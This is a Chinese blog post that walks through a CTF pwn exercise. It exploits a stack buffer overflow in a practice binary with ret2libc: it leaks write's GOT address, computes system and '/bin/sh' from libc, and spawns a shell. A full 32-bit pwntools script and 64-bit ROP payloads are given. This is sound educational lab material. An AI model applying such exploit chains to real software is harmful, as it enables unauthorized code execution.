栈溢出基础练习题——4(写有64和32位两种攻击方式)

已于 2022-07-08 17:20:19 修改
阅读量653 收藏 3
点赞数 1
分类专栏: CTF训练 PWN 文章标签: PWN linux
于 2022-07-08 13:52:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/125676322
版权
CTF训练 同时被 2 个专栏收录
46 篇文章 15 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏

题目地址:请看pwn栈溢出基础练习题——1 ;放了本博客的所有练习题目
pwn3

该题详解

题目分析

题目给了libc函数
先checksec
在这里插入图片描述
反编译,明显存在一个漏洞函数,通过read()栈溢出
在这里插入图片描述
但此题困难点在于栈不能shellcode,并且并不存在system函数,但给了libc,则可以通过libc找到system函数

libc装载入内存时,基地址会变化,但由于是整体装入,函数偏移并不会变化
tips:本题虽然给了libc,但要是想打本地还是要用本地的libc,不然会出问题

思路:通过write函数输出write的真实地址,然后通过libc找到system的真实地址,调用system函数并传入/bin/sh参数即可

利用本地libc打本通本地

利用lld level3可以查看该函数在本地使用的libc
在这里插入图片描述
但该libc只是一个软连接,避免意外,找到真实libc最好,使用file libc文件即可
在这里插入图片描述
发现真实libc地址:/lib/i386-linux-gnu/libc-2.33.so

调试计算溢出地址


计算偏移地址为0x88+4

得到system函数地址

函数调用时,plt和got表关系图,总体而言got表存放了函数的真实地址
在这里插入图片描述
想法:可以根据已有的write函数地址和libc中的write函数可以计算libc这次载入时的基地址,基地址+system地址的偏移即可计算出system函数真实地址
因此我们要计算出函数运行时的write函数的真实地址,只需要输出got表中的write地址即可,并且可以通过用write函数将地址信息输出出来,则溢出目的:调用write函数并输出write函数真实地址

ssize_t write(int fd,void*buf,size_t count)

fd: 是文件描述符,对应1
buf: 需要写入的数据,通常为字符串;
count: 每次写入的字节数

payload = cyclic(0x88_4) + p32(elf.plt["write"]) + p32(elf.symbols["vulnerable_function"])+p32(1)+p32(elf.got["write"])+p32(4)
io.send(payload)
io.recv()

在这里插入图片描述

压入vulnerable_function_addr地址是因为这题还未解决,还要再次利用vulnerable_function里的read溢出,因此希望执行完后将函数返回到vulnerable_function

结果
在这里插入图片描述
这里输出的是字符串格式,用u32()解码即可
在这里插入图片描述
write真实地址为0xf7e4ad50

计算system真实地址

在这里插入图片描述

找到/bin/sh地址

虽然题目中没有/bin/sh地址,但是libc中存在,利用libc找到/bin/sh
bin_sh = libc_base + next(libc.search(b’/bin/sh’))

进行二次栈溢出

payload = cyclic(0x88+4)+p32(system_addr)+b’AAAA’ + p32(bin_sh)
在这里插入图片描述

完整攻击代码

from pwn import *
elf = ELF("./level3")
libc = ELF("/lib/i386-linux-gnu/libc-2.33.so")
io = process("./level3")
# 进行第一次栈溢出,并返回vulnerable函数
payload = cyclic(0x88+4) + p32(elf.plt["write"]) + p32(elf.symbols["vulnerable_function"])+p32(1)+p32(elf.got["write"])+p32(4)
io.send(payload)
io.recv()
write_addr = int(hex(u32(b'P\xad\xe4\xf7')),16)
libc_base = write_addr - libc.symbols["write"]
system_addr = libc_base + libc.symbols["system"]
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
# 进行第二次栈溢出,进入sh
payload = cyclic(0x88+4)+p32(system_addr)+b'AAAA'  + p32(bin_sh) 
io.send(payload)
io.interactive()

64位

64位与32位函数调用时的区别

x86:

  • 使用栈传递参数
  • 使用eax存返回值
    在这里插入图片描述

注意x86参数是倒序存入栈的
amd64:

  • 前6个参数依次存放于rdi,rsi,rdx,rcx,r8,r9寄存器中
  • 后7个参数存放于栈中
    在这里插入图片描述

注意寄存器是顺着放入,当存入栈时也是逆序放入,因为栈先进后出

栈构造图

由于64位参数放在寄存器中,前三个参数分别放置在rdi,rsi,rdx
先ROPgadget下看这三个寄存器是否能pop ret
在这里插入图片描述
发现存在rdi、rsi ,但不没有rdx,由于是write函数的三个参数,第三个参数是输出数据的长度,我们这想要其输出write函数的真实地址,因此第三个参数>8即可,因此rdx存的值>8就行,这就看运气了
第一次栈溢出的栈结构图:
在这里插入图片描述

payload = b'A'*(128+8) + p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_r15_ret) + p64(elf.got["write"]) + b'A'*8 + p64(elf.plt["write"]) + p64(elf.symbols["vulnerable_function"])

第二次栈溢出的结构图

payload = b'A'*(128+8) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_addr)

在这里插入图片描述

Mokapeng
关注
专栏目录
栈溢出原理及解题练习
weixin_44222568的博客
04-15 1955
一个小白的慢慢理会过程
缓冲区溢出——《深入理解计算机系统》习题3.38详解
编程小朋鸟的专栏
08-20 2590
缓冲区溢出——《深入理解计算机系统》习题3.38详解最近在攻读《深入理解计算机系统》(CS:APP)一书,上面的实验题很有趣味。习题3.38说明了缓冲区溢出的基本原理,我颇费了一番心思才搞定了这道题,详解如下。一、题目:从CS:APP的网站上下载文件bufbomb.c,内容如下:/* Bomb program that is solved using a buffer overflow attack */ #include #include #include /* Like gets, excep
pwn栈溢出基础练习题——1
qq_41696518的博客
07-06 471
pwn练习题
栈溢出攻击
andy41020955的专栏
02-17 779
转自http://blog.csdn.net/lpmygod/article/details/7458769   本文的实验来源于《Computer Systems A Programmer's Perspective》(深入理解计算机系统》一书中第三章的一个实验。 作者给出了一个含有缓冲区溢出的程序bufbomb.c,你需要做的,就是注入给缓冲区些特殊的数据,到底利用缓冲区的目的。
栈溢出基础练习题——3 (内有32和64位区别的对比)
qq_41696518的博客
07-07 345
pwn练习题-level2
linux 函数栈溢出,64Linux下的栈溢出
weixin_30175731的博客
05-03 549
今天在看《捉虫日记》,其中讲解的Linux下的栈缓冲区溢出32位机器的,和我的64位机器有些不同之处。下面是我在64Linux (Ubuntu14) 下的栈缓冲区溢出实验的记录。首先是有溢出漏洞的程序,这个程序来自于《捉虫日记》。#includevoid overflow(char *arg){char buf[12];strcpy(buf, arg);}int main(int argc, ...
64栈溢出
weixin_44932880的博客
10-13 866
64位程序栈溢出 当参数少于7个时, 参数<1-6>放入寄存器: rdi, rsi, rdx, rcx, r8, r9 栈 High Address | | +-----------------+ | 第7参数(如果有) | +-----------------+ | return address | +-------
栈相关习题及详解(选择题和综合题) ——数据结构
Amour
10-26 1万+
栈的基本概念栈的定义栈:只允许在一端进行插入或删除操作的线性表。首先栈是一种线性表,但是限定这种线性表只能在某一端进行插入和删除操作。栈顶:线性表允许进行插入和删除的那一端 栈底:固定的,不允许进行插入和删除的另一端 空栈:不含任何元素的空表。进栈出栈的变化形式最先进栈的元素,是不是就只能是最后出栈呢答案是不一定,要看什么情况。栈对线性表的插入和删除的位置进行了限制,并没有对元素进出的时间进行限
单片机原理及应用——基于Proteus和Keil_C林立版课后习题答案.docx
09-23
PSW.7 是进/借位标志 CY,PSW.6 是辅助进位标志 AC,PSW.5 和 PSW.1 是用户标志位 F0 和 F1,PSW.4 和 PSW.3 是工作寄存器选择控制位 RS1 和 RS0,PSW.2 是溢出标志位 OV,PSW.0 是奇偶标志位 P。 8. 时钟周期、...
数据结构——栈和队列
FREEDOM’s blog
07-07 931
1.栈 2. 队列 3.特殊矩阵的压缩存储
单片机原理及应用——基于Proteus和KeilC林立版课后习题答案.pdf
01-24
PSW.4、PSW.3:工作寄存器选择控制位RS1和RS0,00至11分别选择四组工作之一作为当前工作寄存器PSW.2:溢出标志位OV,有符号数加、减运算结果有溢出或乘除上结果异常(乘法运算结果大于255即乘积在BA中,或除法运算...
软考——练习题(一)
正在路上
03-26 837
练习题(一)1.为实现程序指令的顺序执行,CPU( )中的值将自动加1。2.以下关于计算机系统中断概念的叙述中,正确的是( )。3.软件设计时需要遵循抽象、模块化、信息隐蔽和模块独立原则。在划分软件系统模块时,应尽量做到( )。4.关于64位和32位微处理器,不能以2倍关系描述的是( )。5.计算机指令一般包括操作码和地址码两部分,为分析执行一条指令,其( )。 1.为实现程序指令的顺序执行,CPU( )中的值将自动加1。 A.指令寄存器(IR) B.程序计数器(PC) C.地址寄存器(AR) D.指令译码
快速计算栈溢出长度
kelxLZ的博客
11-27 1665
Author:ZERO-A-ONE Date:2021-11-27 之前看到网上很多在编栈溢出的时候计算栈溢出长度的文章,很多工具或者方法放到现在以及没有办法使用了,我经常使用的工具是pwndbg里面调用pwntools的cyclic工具 我们以CTF Wiki里面的示例程序stack-example为例子 首先用IDA找到溢出函数gets的下一个地址为0x804849f,打断点 b *0x804849f 然后使用cyclic工具生成测试字符串 pwndbg> cyclic 200 aaaab.
linux 64栈溢出,栈溢出64位程序的处理方法
weixin_39717865的博客
05-13 1471
在做 pwn 题时,难免会遇到64位的栈溢出程序,处理32位64位程序会有所不同。这里总结一下64位和32位程序的差异,并结合两道例题给出解题方法0x00 差异1.64 位函数调用需要使用寄存器传参,前三个参数存放在寄存器 rdi、rsi、rdx 中,32 位函数调用使用栈传参(具体看下面的例子)2.64程序一个存储单元占8个字节,32位占4个字节。所以在填充 ebp(rbp) 时会有差异,这是...
ZLibrary又复活了,全球最大的数字图书馆
最新发布
weixin_42793435的博客
01-30 2万+
Z-Librαry被称为全球最大的数字图书馆,可以免费下载各类电子书籍但树大招风,自从前阵子被美国查封后,不论其域名还是各种镜像站几乎都被屏蔽了,想要免费下载图书愈发困难起来不过随着时间推移,又出现了不少可以正常下载Z-Librαry内容的途径今天便给大家分享两款免费无限制的下载工具,整体体验不错,希望你们喜欢~今天的分享就到这里了如果对您有用,可以帮小编来个三连,怎么连都可以滴~ 作。
机器学习之朴素贝叶斯分类算法
热门推荐
lixinkuan的博客
09-25 17万+
一、数学知识相关 1.独立事件--前提 2.条件概率 3.全概率公式 4.贝叶斯公式 5.朴素贝叶斯公式 其中: P(A)叫做A事件的先验概率,即一般情况下,认为A发生的概率。 P(B|A)叫做似然度,是A假设条件成立的情况下发生B的概率。 P(A|B)叫做后验概率,在B发生的情况下发生A的概率,也就是要求的概率。P(B)叫做标准化常量,即在一般情况下,认为B...
溢出练习题pwn1
Elvira
08-26 5155
集训慢慢接近了尾声,樊荣学长给我们jian
LibcSearcher的使用
Sakura给爷pwn全场
12-03 1481
BUUCTF ciscn_2019_c_1 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() sla=lambda x,y:io.sendlineafter(x,y) io=remote('xxx',xxx) elf=ELF('
pwn题解level(2)
qq_43627239的博客
07-25 604
今天oj里边的level2和level3的32位64位四道题 一下32位 其中包含libc 题解之前 先补充两个内容 1.checksec 是用来检查可执行文件属性的。 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,linux中把这种cookie信息称为canary,所以如果开...
全面覆盖栈习题的一本通数据结构
最后,一本通数据结构——栈习题集所包含的内容,无疑为学习者提供了一套全面的练习材料,能够帮助他们更深入地理解和掌握栈这种数据结构。希望读者能够喜欢,并通过这些习题提升自己在算法和数据结构方面的实践能力...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值